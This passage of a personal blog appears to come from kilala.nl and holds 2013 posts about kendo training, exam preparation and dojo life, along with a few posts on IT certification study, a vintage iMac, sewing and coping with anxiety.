That was the big take-away from today: be ready to jump and kill from the get-go, don't start building your energy after you've already engaged your opponent.

It was a sobering experience, which is something I need from time to time to remind me that I really am a rank beginner. But I'm going to use it to motivate myself. And yes, I'm still going to take the exam next week, simply to get an appraisal of my current level. It'll be a learning experience, however it turns out.


kilala.nl tags: , ,

View or add comments (curr. 0)

It's the small things

2013-05-08 08:38:00

mr Miyagi

Yesterday's training has two big take-aways for me.

  1. I should never break kamae, especially if I'm tired.
  2. I should hit. ( ^_^)

Throughout class I had been paying attention to all my weak points: only use my left hand, relax in kamae after kakegoe, don't have my left heel too high, proper timing of strikes and fumikomi, practice my chisai men strikes in the right way and keep on pushing through the exhaustion. I was feeling pretty good about myself! I managed to get through five of the six rounds of jigeiko too :)

Then comes the time to do jigeiko with Tsuyuguchi-sensei. He attacks me a few times, I attack him a few times but I leave plenty of openings unused. Then we get into tsubazeriai and he looks me in the eye smiling and says:

"You should hit."

I keep on making glancing blows against him and I often fail to grasp an opening he makes for me. Again in tsubazeria he smiles and repeats: "You should hit. You should hit." And he's right. Obviously. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Working towards my exams

2013-05-06 08:19:00

Change of plans! A few weeks ago I had a chat with Marli, who'd asked me if I still wanted to take my ikkyu exam by the end of May. Originally I'd take the test in winter because of our wedding anniversary, but since we're taking a few days of fun midweek she wanted me to go anyway. Yay :)

I'm feeling pretty confident about taking the ikkyu exam, insofar that I -know- most of the things I need to demonstrate. Most of the things I can actually do well, but I am not certain that my fighting skills are at the level that's needed. The most important weak point is my hunger/bloodlust: as Donatella-sensei remarked months ago I attack a general direction, not a specific target.

Saturday's class was great and started off with a nice surprise: our friend Sebastian, who departed for Germany a few months after I started kendo, came to visit for some jigeiko! In the absence of Ton-sensei and Hillen, Kris-fukushou led class with kihon and jigeiko. Many things were said and done, some important pointers being:

For me personally, Kris had two important points of feedback:

As my mantra for mokuso goes these days: "every week a little stronger"... Despite getting more and more tired, I fought myself through jigeiko.


kilala.nl tags: , ,

View or add comments (curr. 0)

Centrale training: shiai and shinpan training

2013-04-28 21:03:00

Today was hard work! Over sixty people traveled to Sporthallen Zuid in Amsterdam for the national level 'central training'. This month's edition focused on shiai and shinpan skills, meaning both the fighting and the referreeing of competitions. Today, Renshinjuku's turnup was also impressive with a dozen members attending. Excellent :)

It was a lot to take in! Before lunch, Mark Herbold-sensei took us through kihon in order to practice legwork and speed. He impressed upon us the importance of moving from the legs and hips, with 80% of your effort coming from there. The remaining effort is 10% stomach to retain posture, then 8% and 2% left/right hands for the strike. By properly using your hips and legs you assure that you close in quickly and that you retain control of the situation.

Exercises included kirikaeshi, oki-men, oki-kote-men, hayai kote-men and then a number of hayai variations of kote-men, kote-men-men, kote-kote-men, kote-men-kote-men and so on. In each of these, the connection and distance between both kendoka was key: kakarite needs to move in fast enough to pressure motodachi backwards. Motodachi needs to be surprised and should not dance backwards before the attach. Learning this speed and pressure is what will help you overwhelm your opponent in shiai

After lunch Vitalis-sensei went over a few basics regarding referreeing: valid strikes and hansoku (violations).

A valid point only has the following five requirements:

  1. Using the kensen, the top 1/3 of your blade.
  2. Using the hasuji, the cutting edge of the blade.
  3. On the datotsu-bui, the proper part of the target.
  4. With fighting spirit.
  5. With proper zanshin.

Salmon-sensei has written a little more about what makes a valid ippon. Vitalis-sensei remarked that many things that we learn are important for a strike (like ki-ken-tai-ichi) are NOT in the rulebook. This means they are NOT required for ippon. He also impressed upon us that there are two common mistakes that beginning shinpan make:

After Louis' introduction the sixty kendoka were divided across three shiaijo, each led by a high ranking sensei. I was assigned to Mark Herbold-sensei's shiaijo. He led the session with clear instructions and a pleasant amount of humor. He explained so many things, it's hard to remember them all. The following will simply be a stream of conciousness, trying to recall as much as possible of what was said.

The following points were made for me specifically:

 

The last hour of the day was free jigeiko. Sadly I had to leave early, but I'll get another chance later :)


kilala.nl tags: , ,

View or add comments (curr. 0)

"Let's do it!" kendo etiquette poster

2013-04-22 23:40:00

kendo etiquette poster

I recently found myself inspired by Bunpei Yorifuji's famous "Please do it..." campaign posters promoting etiquette in the Tokyo subway. They are catchy, they're a bit funny and they manage to drive home a message clearly.

"What if", I thought, "we applied the same design esthetic and message to kendo?". Thus work has started on a kendo-centric set of "Please do it..." posters. First up, based on last weekend's shinai inspection, is a poster about maintenance. It is everybody's duty to ensure their equipment is safe and that no harm can be done to your fellow kendoka. Loose splinters on shinai may pierce somebody's eye!

The Japanese sentences were made using JEDict and Google Translate, so I'm sure they're full of mistakes. Please correct me!


kilala.nl tags: , ,

View or add comments (curr. 0)

Making a juban (undershirt) for kendo

2013-04-20 08:13:00

a cotton under shirt for kendo

With summer coming up I'm looking for ways to minimize wear and tear on my keikogi, the thick jackets we wear in kendo. The keikogi suck up loads of sweat and thus become pretty dirty very quickly. Unfortunately they also fade quickly and the rice-grain pattern also wears out pretty quickly if you launder them often. 

Traditionally, to keep expensive silk kimono clean, people wear juban which is a simple cotton undershirt. When I say "simple" I mean "less elaborate than a kimono", just check out the Pinterest on juban. There are even simpler juban, which look like thin white keikogi, sold by budogu such as Yamato. And that's exactly what I need, but I'll be damned if I pay $30-$40 for a simple shirt! That sewing machine isn't simply gathering dust in the attic!

Because I don't have any cotton lying around just now, I've modified a few of my old projects. Years and years back, when I was still in the SCA, I made two cotton under-tunics. Meant to be worn under my full-length tunic as an extra layer, they were thigh-length and had long sleeves. In order for them to be worn as juban, I have shortened the sleeves and the body so they don't show from under my keikogi

So now I have two neat undershirts for kendo... And they even have embroidery on them! 

And to think I made those things fourteen years ago! Fourteen! ( O_o)


kilala.nl tags: , ,

View or add comments (curr. 2)

I was going to write, but then I fell asleep

2013-04-17 08:11:00

Hoooo boy, last night's training was good! Despite my hay fever I soldiered on and because of that I was dead tired when I came home. I managed to unpack my equipment bag, but nothing more. The moment my head hit the pillow I was g.o.n.e. Boom. I showered at the office just now ;)

Last week and yesterday class was led by Jouke-sempai, who was in the Netherlands for last weekend's EKC. Where we usually practice upwards of six techniques a night in 2x(2x5) bouts, he now had us repeating the same technique in a 2x(5min) setup. This dramatically lowered the amount of different things we got to try, but there are two huge benefits:

  1. Muscle memory
  2. The time to reflect

During kihon practice we focused on men (both oki and hayai), hayai kote and kote-men and finally hiki waza. The following points were made:

The past weeks, Hillen-sempai and Ton-sensei reprimanded me for my horrible hayai kote. I keep going in arcs, which messes up the practice we're doing. Yesterday I got the same reprimand from Miyahara-sensei. She had me do it over and over again, until I started showing something resembling a good kote-strike. Straight and through the center, no need to raise it high, no need to go wide.

Tsuyuguchi-sensei spent a lot of his time explaining hiki waza to me. Most of it was in Japanese (probably because I had given the impression that I speak it) so I missed big parts of it. However, the essence of what he tried to convey is this:

  1. Keep your hands low and lock the tsuba.
  2. Tsubazeriai is all about the hips, push from the hips.
  3. Put strong pressure against your opponent and push away.
  4. Did I say it's about the hips? Because you need to work from the hips!

I really appreciate the effort he put into explaining these things to me! It's the first time we've really spoken, so I went up to him after class to thank him again. Point #3 is a bit confusing for me, because I have often been told not to put any pressure in tsubazeriai. Not until you actually push off for your strike.

In jigeiko I had the chance to spar with Miyahara-sensei, who went over hayai kote with me some more. Try, try, try and try again. We also tried a number of other techniques, with her seemingly focussing on hayai men and debana kote. I also started jigeiko with Onno-sempai, but I had to bow out early because of my dizziness (thankyouverymuch hay fever). I spent the last ten minutes of class helping out our kouhai Gaby in practicing her kote strikes and footwork.

I haven't written much about kendo the past two months. Here's what happened.


kilala.nl tags: , ,

View or add comments (curr. 0)

Virt-ception: we've got to go deeper

2013-04-11 20:45:00

Desktop

I'm currently studying for my RHCSA certification. As part of the exam I will need to work with KVM virtual machines, which require a proper piece of hardware to run on.

Sadly I haven't been able to boot CentOS off a USB drive on my Macbook, despite numerous attempts. I've had a number of great tutorials, but no dice. Luckily my colleague Peter (not the one of the iMac) came to the rescue! He runs a sandbox system at home, which is a great playground to study for the RHCSA. He gave me an account and permissions to fiddle with KVM. 

Which is what landed me with the screenshot above. That's:


kilala.nl tags: , , ,

View or add comments (curr. 2)

A dream come true

2013-03-10 21:00:00

my new iMac G4

A few days ago I was discussing various models of Apple computers with one of the other consultants at the office. It didn't take me long to wax lyrically about the iMac G4, which in my opinion is the most beautiful PC ever produced by Apple. It combined good specs with a revolutionary design: the sunflower / lampshade design was really new. In my opinion the flexing arm for the screen really is one of the best inventions ever and I'm sad that the only way to get one with normal monitors, is to buy an expensive extra mount. 

Anyway, my colleague Peter overheard us talking and wondered whether I'd be interested in owning an iMac G4. DO I?! Haha, of course! It's been a dream of mine for a damn long time. The above paragraph should have made it clear that I love the design of the machine and that I consider it a timeless classic. Which is why he offhandedly remarked that his girlfriend has one at home, one they've considered sending to the scrapheap for a while now. Holy carp! ( O_o)

So here I am! Giddy and gleeful! Because what I now own, with many thanks to Peter and Ellen, is an iMac G4/1.25 17-Inch "FP" (USB 2.0). Or to put it in human words: the latest model of the iMac G4 series, with the improved TFT screen as well as USB2/FW400. It's from the same era when I bought my first Macintosh, the venerable Powermac G5 (aka, the first "cheese grater"). And it's in pristine condition, because they hardly ever used it. It's beautiful! It's complete (no parts missing) and it's now mine :9

The setup above is just about exactly how you'd expect to see it in 2003, with the exception of the speakers. The Apple Pro speakers look great, but they really don't sound too great. So I've replaced those with the LaCie Firewire Speakers that I bought years ago. These really sound awesome and come with a minimum of cable fuss as they are also bus-powered.

The iMac came with OS 10.4.11 installed, which is pretty old already. Unfortunately I don't have my 10.5 DVD anymore (returned to Snow when i left their company), so I'm borrowing a friend's install disk. When it's upgraded to 10.5 I'm sure it'll make a heck of a nice machine. Heck, even at 10.4 it's already very nice and completely usable. I'm actually surprised at the performance! The 1.25GHz G4 and the 768MB RAM work very nicely.


kilala.nl tags: , , ,

View or add comments (curr. 6)

A visit by Furuya-sensei

2013-03-06 10:29:00

It has been a month of remarkable kendo! First there was the big party, then last week was a tiny group of people and yesterday Furuya-sensei paid us a visit. Stopping over for a single day on his way to the Furuya Cup in Peru, he made sure to come observe the dojo he helped raise in the Netherlands. We were also joined by Mark Herbold-sensei, who recently achieved 7-dan.

With roughly thirtyfive kendoka attending the training session we used the motodachi system, with anyone 3-dan and higher acting as motodachi. We worked on solidifying our basics: kirikaeshi, men, kote-men and kote-do. We closed with half an hour of jigeiko.

The following points were stressed during class:

Because our founder's sensei was present, a lot of attention was paid to mistakes in etiquette. For example:

Furuya-sensei indicated that he was happy to be back in the Netherlands and to train with us. He hopes that we will continue training hard, working on improving our kendo. He also hopes that next year we can organize another Furuya Cup in the Netherlands, as it is an important tourney in Europe.

In jigeiko I practiced with four people:

  1. I started with Bert Heeren-sensei. He took me through a mix of uchikomi keiko and kakari geiko, where he either showed an opening, let me make one or where he attacked me. He indicated that he was pleased with how I was doing, with regards to the effort I'm showing. He didn't comment on my kendo, as his goal with our jigeiko is mostly to make me fearless. I should not fear my opponent, nor should I hesitate, regardless whether I'm up against a kouhai, a sempai or a 6-dan teacher.
  2. After being absent for a few months, I'm glad I got to spar with Mischa. I mostly tried to practice chisai men and debana kote, but threw in some other stuff as well. I'm nowhere near his level yet (obviously, as he's 3-dan I believe), but I hope that we both took something away from the practice.
  3. I also ran it hard against Jeroen and Davin, with whom I am roughly on par. These two rounds of practice were excellent to go all out and thrown in the last shreds of energy I had.

kilala.nl tags: , ,

View or add comments (curr. 0)

Overview of dutch kendo dojo

2013-02-28 07:20:00

Yesterday I spent a few hours gathering information on all dutch kendo dojo. The NKR only has a list of city+dojo name on their website, which isn't terrifically navigable. I took the list, gathered all the website information and then gathered all dojo locations. I then spent an hour putting them all into a Google Maps project. The result: a map of all dutch kendo dojo.

 

 

Also in dutch, so dutch kendoka can find it:

Gisteren heb ik een paar uurtjes besteed aan het verzamelen van informatie over Nederlandse kendo dojo. De NKR heeft een lijst met steden en dojo namen op hun site staan, maar heel erg handig werkt die niet. Ik heb van alle dojo's op de lijst een overzicht gemaakt van hun website, plus het adres van hun trainingslocaties. Daarna kostte het me een uur om ze allemaal in een Google Maps project te zetten. Het resultaat: een overzicht van alle Nederlandse kendo dojo, op de kaart.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Booyah! My biggest failing in kendo analyzed

2013-02-24 21:49:00

My wife, ladies and gentlemen! My dear wife just helped me figure out one of my biggest failings in kendo!

Countless times I have been told by various teachers that I double-step or step through when jumping in for a strike. I keep getting warned about it, but I've never conciously felt it happen. Sure I was aware that I keep shuffling my feet to find footing for the lunge, but I've never felt the "step through with left" happening. Until last night during the big training, when I think I felt it happen at the back of my head. 

But that's not the big succes here. No, that's my wife's analysis of the same situation!

Watching me do kihon practice, she noticed that my whole body teeters to the right when I'm about to lunge. It happens especially when I start leaning in for the lunge. And then, when I lunge, she sees me pull left up to the right foot (or past it!) after which I actually jump.

And the answer is!.... *drumroll* Weight distribution!!!

I keep my weight too much on the front leg and then I only increase that when I start leaning in for the lunge. Earlier, I learned that back-front should be 60-40 at rest. In my case it's probably reversed: back-front is 40-60. Then it gets worse when I lunge, going to 20-80! THAT'S WRONG! How can I jump from the left foot, when all my weight is on the right?! That's right, I cannot! Which is why I instintively doublestep/overstep, to get the weight back on the left foot. 

I'm so grateful that she saw through that! This really gives me clear details to work with.


kilala.nl tags: , , ,

View or add comments (curr. 8)

Anxieties and living with them

2013-02-24 21:27:00

The past few months I've been dealing with my anxieties in what, I hope, is a better way than before. Having been through CBT has certainly been empowering and educational. That doesn't mean that I'm free of anxiety, but it does mean that I've learned ways of dealing with them. 

Funnily, yesterday I had a bout of anxiety when we dropped off our daughter with her grandparents in Friesland. Plenty of doubts and worries pent up about her sleepover, which led to some physical effects while we were there and on the drive home. I was also a bit anxious about the night's kendo practice. All of that was mostly resolved by talking about it with Marli, which certainly is one of the prime methods I've learned: dispelling illogical and worrisome thoughts with the help of others. 

I am writing an article for Kendo World magazine, based on my experiences with anxiety and kendo. The article will explain what anxiety disorders are, how they are treated, how I've experienced it and how it can occur in a kendo dojo. If everything goes as planned it'll be printed in the next issue. Exciting!


kilala.nl tags: , ,

View or add comments (curr. 0)

Successes from coaching

2013-02-24 20:52:00

Keuzes Maken

For the past few months I've been undergoing personal coaching, by Menno. Today we simply spoke about the successes I've booked over the past few weeks. All of them were brought on by actions I undertook based on the coaching i've been receiving. Each of the following was an 'action point' or 'todo' item from our sessions. 


kilala.nl tags: , , ,

View or add comments (curr. 1)

An awesome night of kendo with friends

2013-02-24 20:16:00

Training

Yesterday was wonderful, a great night of kendo and of building friendship. Renshinjuku Kendo Dojo organized a big training and buffet party in honor of a few of our members. Fukuyama-sensei and his family, as well as Tanida-sempai and his family are returning to Japan. Also, Kurogi-sensei recently achieved seventh dan ranking. Great reasons for a 'Sayonara & Omedetou' (farewell and congratulations) party.

Marli came with me, which means a lot to me. Last time she hadn't enjoyed the buffet very much, so it says something that she tagged along again. Sweetie <3 Double-sweet, because she spent some time taking notes about my performance.

I was expecting a bigger turnup than usual, as it was the Saturday afternoon training. What I did NOT expect was sixty to seventy kendoka turning up! Kurogi-sensei brought along a number of his students from Belgium and a five-strong delegation from Scotland was also in town, for today's Iijimia Cup. Because it was such a big group we ran the night in the motodachi system, with twelve higher ranking teachers lining up to train with all students. Roelof-sensei took care of the fifteen beginners.

Training consisted of kihon and a few waza: kirikaeshi, oki-men, oki-kote-men, chisai-men, chisai-kote-men, men-taiatari-hiki-men-men, men-taiatari-hiki-kote-men. Then an hour of jigeiko! I sparred with Fukuyama-sensei, a gentleman I am not familiar with and with Tsuyuguchi-sensei.

I always enjoyed working with Fukuyama-sensei, so I'm sad to see him go. There's just something cool about his ever-smiling face behind the mengane. In the photo above I'm at the far right, practicing chisai-men with Fukuyama-sensei.

During jigeiko I was feeling the effects of the afternoon's anxiety and I was close to quiting three times. But every time I thought "just one more fight" and then I pushed through. It sure helped that, during waza practice, Heeren-sensei shortly took me aside to compliment me, reassuring me that I was doing alright.

Dinner was nice and we enjoyed a good, long chat with my kendo friends. Jeroen, Zicarlo, Davin, Nienke, Gaby, all fun people to talk to about kendo and other geekery :) I also had a nice, open-hearted talk with Heeren-sensei which provided me with some much-needed insights.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Starting preparations for RHCSA

2013-02-21 22:31:00

Well, this is a first. Sometime soon, my Macbook will be booting another operating system than Mac OS X for the very first time in its life. Sure it's run Solaris, Fedora and Windows! But that was using Parallels virtual machines...

In order to prepare for the RHCSA certification I will need to learn about setting up virtual machines on a physical Linux box. And since we don't have the €200-€300 to buy a test box (which I'll only use for these two exams) I'm stuck using my primary laptop. That means I will be taking notes locally on Linux, which should be a cinch using the Evernote web interface.

I just hope that running CentOS on an external USB 2.0 drive hooked up to my 2008 laptop won't be too slow to work with :)


kilala.nl tags: , ,

View or add comments (curr. 0)

ITILv3 certification achieved

2013-02-17 08:55:00

ITILv3 certificate

Right, that's out of the way!

In late december I made a plan for 2013, which would enable me to retain my CISSP certification while at the same time restoring my relevance to the IT job market. A few weeks later I got started on my ITILv3 studies, but those ground to a sudden halt when I chose an awful book to study from. A week later I started anew using the study guide by Gallacher and Morris, which is a great book!

A month after starting the Gallacher and Morris book I took my exam using the EXIN Anywhere online examination. I didn't want to spend time away from the office to take this simple exam, which is why I went for the online offering. I'm very glad EXIN are providing this service! I thought I'd share my experience with the EXIN Anywhere method here.

I also provided EXIN with two pieces of feedback after taking the exam.

  1. During the setup phase, you are allowed to re-take your photograph and to re-take the photograph of your ID card. However, there is no option available to restart the room inspection. During my room inspection an error popped up from the proctor software which suggested that filming could maybe not be completed. But no definitive answer was provided and there was no option to restart the filming of your workspace. I sincerely hope I don't get failed on the exam because of this.
  2. The exam format is rather unfriendly, when compared to other computer-based exams. In essence it is simply a long HTML document with all the questions underneath eachother. Other testing suites (though admittedly offline) put the questions in much more user-friendly format. One question at a time, an option to mark questions for review, etc.

All in all I'm happy with how all of this went and it's certainly nice to have refreshed my ITIL knowledge. I last studied ITILv2 in 2001.

The fact that it took me a month to study for this test worries me a bit though. The total prep time for ITILv3 was 15 hours (translating into 15CPE for my CISSP). I'm fairly certain that my RHCSA will easily take over 80 hours, which does not bode well. I reckon it might be somewhere between my LPIC and my CISSP studies when it comes to workload. If I want to achieve it within a reasonable timeframe, I will need to stick to a much stricter regime. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Bad kendo, great training and moral dilemmas

2013-02-13 07:49:00

Last night's training was awesome: I was beat by the end, knowing I certainly gave it my best effort.

Unfortunately my kendo was crap, because every little bit of basics was wrong. I was pulled aside by every single senior sempai with whom I crossed shinai! Heeren-sensei grabbed me twice, once to point out mistakes in my striking and once adminish me on my footwork. The same footwork issues were also reported by both Koseki-sensei and Kiwa-sempai. Ran-sempai sternly indicated that I constantly dropped pressure in jigeiko and that I was not even responding to any of the openings he made. Makoto-sempai saw right away that my timing of ki-ken-tai-ichi was completely dead and Miyahara-sensei complained about a headache from my men strikes by the end of class. She didn't think I was striking too hard or with too much right-hand, but mostly from too close range.

So every little bit of basics was wrong: footwork, striking, tenouchi, timing, ki-ken-tai-ichi, swinging, shinai grip. Everything. I didn't allow myself to get too frustrated because all of it, only getting irked a little right after the explanation and then moving on.

On the way home I had a good talk with Jeroen-sempai, about the future of our Almere dojo. We both feel that the dojo could use a heavy dose of discipline and rigour and that it would be great if it started mirroring the Amstelveen dojo. We are however unsure how this could be achieved under the current leadership. In the past I've already been told by sensei that my stance is to strict and that my teaching of the beginners' group was too harsh and that enforcing discipline to the degree I'd desire would scare off all the beginners.

Jeroen and I will be submitting a few suggestions pertaining to class structure and instruction to beginners. Most importantly, Jeroen thinks that our whole group would be best served by focusing more on basics than on waza practice. Every week the bogu-group spends a lot of time practicing many different waza for a tiny amount of time and Jeroen would suggest that we instead divide our practice into a monthly schedule: weeks 1, 2 and 3 are spent practicing one specific subject and week 4 will merge them all. I certainly think his idea has merit!

One thing that I am conflicted about is the following: both Marli and myself think that I would make faster progress if I trained at Amstelveen twice a week, instead of once and once in Almere. However, to me this would feel like "abandoning" and disrespecting Almere after all their hospitality and because I truly feel that I can help them grow through the years. So it's a moral dilemma for me: do I choose harder training and faster progress, or do I choose loyality to the group that first took me in?

EDIT 17/02/2013:

Yesterday we did not end up talking to Ton-sensei, because I was occupied before class. While the group practiced kata, I took aside three beginners and Ramon to teach them the basics of shinai maintenance. The night before I had put together a cheapass kit of tools needed for the job: sandpaper, nails (to use as makeshift awl), an exacto knife and a few waxine lights. I taught them how to tighten the tsuru and the nakayui and how to look for splinters. I'm proud of Peter for spotting a bad take in his shinai, correctly noticing that it was splitting across the breadth. 

After warming up and legwork practice I was asked by Ton-sensei to teach the beginners group, while the guys in bogu did kihon practice with those whom already have had a few months' practice. But before we got to that, I taught Felix how to put on a tenugui and his men. The beginners, I took through oki-men and oki-kote by simply doing the suburi strikes back and forth across the training hall. The biggest problem I noticed was that all three of them end up with their arms far too low when striking men: the angles are all wrong. Just like they were with me ;)

My part of their training was ended with me introducing the mechanics of seme-to-tame-to-butsu to them. I didn't tell all of it to them, just to kakegoe, hold their breath, focus and then strike.  This showed good results with the two older beginners who were indeed more focused. But the youngster (I think he's 11) was afraid to kakegoe, he felt weird yelling at me, very embarassed.


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Structures: solidifying goals and intentions

2013-02-10 11:54:00

My dou, with motto

One of the recuring themes in my coaching sessions with Rockover are "structures": things you put in place to act as reminders of something that you need to (or want to) change. I've talked about one of'm before. In order to solidify my new motto, I've given it the same treatment as the previous one that I took in: both adorn the inside of my dou, the torso armor worn in kendo.

Sure, my kanji look crappy, but it will serve its purpose: to remind me of what I want to achieve at the beginning of every training session, class and seminar. 

EDIT:

That photograph reminds me: the Agyo omamori in my dou is officially way overdue on being returned to the shrine it came from. We bought it in Nara in october of 2011 (photo of the temple), meaning that we were supposed to return in three months ago. Since I'm not religious I don't believe I'm calling down any bad luck upon myself, but then again I do value tradition :) Maybe I should drop another email to the dutch shinto shrine


kilala.nl tags: , , ,

View or add comments (curr. 0)

Whittling down the mistakes

2013-02-06 11:10:00

Last night's training was very nice: no lessons or class, just simply training, training and more training. Kihon, waza and jigeiko. Along the way I received pointers from our higher-ranked kendoka Kiwa, Machi, Makoto and Ran. Many of the pointers come down to improving techniques that are basic and important for my ikkyu ranking.

Funny detail: we relied heavily upon our prior seme-to-tame-to-butsu training last night. During our practice of hiki-men I faced against Makoto and against Loek and both gentlemen really succeeded in making me feel the seme building! Because a second or two after their kakegoe, I instinctively felt chills down my neck and found myself thinking "ohcrapohcrap, here it comes!" ( ^_^)

Also, it's interesting how I tense up in jigeiko. During most of practice my breathing was fine, but in jigeiko I got tired really fast, because my arms and shoulders lock up and my breathing goes to heck.


kilala.nl tags: , ,

View or add comments (curr. 0)

New kendo goodies! Thanks honey

2013-01-30 21:53:00

kendo uniforms and spare parts

In light of my planned ikkyu exam later this year, we'd been talking about buying me a new uniform set: one to keep neat and tidy, only to be used at tournaments and gradings. I'd been putting that off for months, until Marli last week decided to surprise me ( ^_^)

Originally she'd wanted to place the order by herself, but she had no idea what to order. So instead, one evening she grabbed and said "Let's shop!" :D Because I've been very satisfied with the service and products provided by Kendo24, we returned to them. And again they came through! My darling wife ordered me:

As I've grown accustomed from them, Bernd and Katrin provided excelent service. They provided quick and clear email feedback on my questions and shipping was very fast. They even threw in a free pair of chichikawa to attach the men himo, because I couldn't find those on their webshop. 

So, now I have two gi and a hakama for practice and a separate gi and hakama for special occasions. And I finally have a bit bucket of my own, for shinai maintenance.

A few interesting things about the clothes:

 

In closing: Thanks honey! I really appreciate the cool gift and your continued support in my training!


kilala.nl tags: , ,

View or add comments (curr. 0)

A new motto for this year: katsubou

2013-01-29 21:20:00

katsubou

Well! It's not every day that I get a mention on a 7th dan sensei's blog :D

My motto for 2012 was enryo (遠慮): "restraint". 

The motto has served me well and I will continue to be inspired by it. It still adorns my desk and it is on the inside of my dou. At the office I have become better at communicating and at sticking to boundaries and in kendo I have become less apt to rush in foolishly. 

For 2013 I will be adding a new motto, katsubou (渇望): "hunger, craving".

This motto comes through inspiration by four people whom I've come to respect very much. Donatella-sensei and Vitalis-sensei, after their instructions at the last Centrale Training. And Kris and Hillen-fukushou, based on their feedback to our recent kyu exams. Summarizing it: without stupidly rushing in (see above), I need to crave achieving yuko datotsu on my opponent. I need to hunger for "kills" and to show eagerness in all my undertakings. Only then will I be properly training and will I be able to show my current skill level in a shinsa.

Interestingly, this motto is also applicable professionaly insofar that I'm working to retain my CISSP certification. I'd slacked off over the past two years, but now I'm working hard to make up for that. In order to achieve this plan fully, I need to be "hungry". I need to keep at it, working on each successive goal in order to reach the final destination. 

It'll be an interesting year :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Kendo kyu exams in Almere

2013-01-26 16:51:00

Photo gallery of the morning.

This morning were the (semi-)annual kyu grade exams at Renshinjuku kendo dojo. I'm told that we're the only dojo in the Netherlands that actually do intermediate kyu exams, but personally I think they're a good thing. These exams help prepare our students for the actual exam, making the real thing a lot less scary.

Today, thirteen students were testing: five for 5th, one for 4h, two for 3rd and five for 2nd. The way we test 2nd kyu is actually identical to the official 1st kyu exam, meaning that we're getting a full prep for ikkyu

The good news is that everyone testing up to 3rd kyu passed their grade. So congratulations to Ainar, Lukas, Dennis, vincenzo, Herman, Ramon, Aaron and Hugo! Good work eveyrone!

The group testing for 2nd kyu wasn't as successful. Only Jeroen was deemed to be ready to take and pass the ikkyu exam, so many congrulations to him: you've worked hard for this Jeroen!

Bobby, Martijn, Tiamat and myself were all given valuable pointers on what we need to improve to be ready for the 1st kyu exam. Two pieces of advice were applicable to all of us:

  1. In jitsugi, you need to be hungry! You need to really want to make those ippon! Don't be passive and don't do shiai kendo. Instead, have at it!
  2. Stick to kihon. There's no need for über-special techniques, because if you -do- try those they'd better be done right!

At this level you're trying to prove that you fully understand and control the basics.

I had already set a number of goals for myself to work on, in order to attain ikkyu rank: get a decent hayai-men, control my breathing, and less cueing before a strike. Also: make for a neat and tidy kirikaeshi, because a few weeks ago I was still all over the place. Added to this comes the feedback from Kris and Hillen:

After the exams, Aaron said his farewells to me. I'm sad to see him go because he shows a lot of promise. Maybe he'll be back in a few years. 

All in all it was a very educational morning! I am confident that I showed my best kendo:

While my kendo was not up to par to pass our 2nd kyu exam, I am confident that I gave it my best. I simply need to keep on getting better! :)

EDIT: Woohoo! I've spoken to Ton-sensei and he indicates that I defaulted to 3rd kyu, meaning that I have at least improved my kendo since last year. So when it comes to the line-up in class, the only thing that changes is that I have now hopped at least six spots to the right :)


kilala.nl tags: , ,

View or add comments (curr. 3)

Learning a new skill: seme to tame to butsu

2013-01-22 20:09:00

Tonight’s class was guided by Fukuyama-sensei, in the absence of Heeren-sensei, with Kiwa-sempai providing translations for those not familiar with the Japanese language. After the usual warming-up routine (no kata practice tonight), we moved on to two separate but entwined subjects:

  1. Seme to tame to butsu
  2. Hiki waza

In kendo we are often taught to “build pressure”, to “feel tension” before launching an attack. This pressure is described with the word seme (攻め) and it is something that is learned through long practice. The Glossary related to budo and kobudo by Guy Buyens offers the following:

SEME (攻め) in BUDO (武道) is usually used to indicate the initiative to close the distance and maintain the pressure when launching an attack. This can be part of a very decisive and even explosive technique or in combination with TAME (溜め), where pressure is build in a more gradual way and where the final target depends on the reaction of that opponent.

Tame, from the verb tameru, meaning “to ammass” or “to accumulate”. In this case we are creating seme and then gathering more and more tension. For this particular session, Fukuyama-sensei described our exercise as follows:

  1. Assume issoku itto kamae.
  2. Generate seme.
  3. Inhale deeply and kakegoe (*) strongly.
  4. Do NOT inhale, do NOT exhale further.
  5. Hold your breath for five seconds.
  6. Attack at your fiercest, with a very strong kiai.

Fukuyama-sensei explained that, in this exercise, holding your breath will help you retain focus on your opponent and on seme. This way you are deeply invested in your attack, almost guaranteeing a beautiful strike. He compared it to a story he once heard about olympic sprinters, who would finish their 100m dash without breathing to retain 100% focus.

We practice seme to tame to butsu with different kihon and waza: first with chisai men, kote and dou, then in oji waza where motodachi would attack with chisai men. As usual we were told to do our very best attack, because otherwise the exercise would be useless.

Before moving on to jigeiko, we practiced the various hiki waza: men, kote and dou. These exercises were combined with the previous tame exercises. When it came to hiki dou, Fukuyama-sensei explained that moving backwards can be done in three backwards directions.

  1. To the left is sub-optimal, as it makes it hard to properly strike and follow through.
  2. Straight, where you remain on the center line of your opponent.
  3. To the right, making for an easier strike while also putting you off the opponent’s center.

For showing zanshin after hiki dou, Fukuyama-sensei said that you should relax after striking. Your arms should not be tense and your shinai should not be immovable. Instead, follow through downwards in the natural arc of your strike and relax your arms (so you are also ready for a counter attack).

*: For extensive information on kakegoe, what you could call the “kiai in kamae”, please refer to chapter 13 of Noma Hisashi-sensei’s ‘Kendo Reader.


kilala.nl tags: , ,

View or add comments (curr. 0)

Preparing for my exams

2013-01-20 09:37:00

2013 will be a year of exam preparation for me. Not only at work (ITILv3, RHCSA, maintaining my CISSP), but also in kendo. 

Last year I decided that I want to take my ikkyu exam this summer, ikkyu being the first grade that is tested on a national level. I wrote the shinsa prep guide for the RSJ website and based on my research, I will need to do the following for my ikkyu exam:

In the first three tests, kiai is highly important at the ikkyu level, so I'll definitely give that my best!

The NKR exam is still a few months away, so I'm very happy that I'll be getting an extra exam in between. A month ago Ton-sensei announced that Renshinjuku Almere would be holding their local kyu-grade shinsa on 25/01, which is next week. I've asked Ton-sensei and Hillen- and Kris-fukushou to keep in mind my aspiration of testing for ikkyu. For our own exams this means that I'm asking them to allow me to skip a grade and to test for nikyu instead of sankyu, while at the same time asking them to judge me at ikkyu level. That's a bit of a leap (I last tested for yonkyu a year ago), but they appear very willing to help me out for which I am very grateful. 

To do list before next week:


kilala.nl tags: , ,

View or add comments (curr. 2)

Taught kendo for the first time

2013-01-20 08:43:00

